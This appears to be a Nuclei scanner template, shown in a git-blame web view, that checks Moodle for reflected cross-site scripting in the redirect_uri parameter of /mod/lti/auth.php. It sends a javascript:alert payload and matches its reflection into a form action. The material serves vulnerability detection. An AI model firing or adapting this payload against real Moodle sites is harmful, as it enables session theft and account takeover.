nuclei-templates/vulnerabilities/moodle/moodle-xss.yaml

34 lines
713 B
YAML
Raw Normal View History

2021-04-12 18:25:06 +00:00
id: moodle-xss
info:
name: Moodle redirect_uri - Cross-Site Scripting
2021-04-12 18:25:06 +00:00
author: hackergautam
severity: medium
description: XSS in moodle via redirect_uri parameter
reference:
- https://twitter.com/JacksonHHax/status/1391367064154042377
2021-04-12 18:25:06 +00:00
tags: moodle,xss
requests:
- method: GET
path:
- "{{BaseURL}}/mod/lti/auth.php?redirect_uri=javascript:alert('{{randstr}}')"
matchers-condition: and
matchers:
- type: word
part: body
words:
2021-04-13 20:45:17 +00:00
- '{{randstr}}'
- '<form action="javascript:alert'
condition: and
2021-04-12 18:25:06 +00:00
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"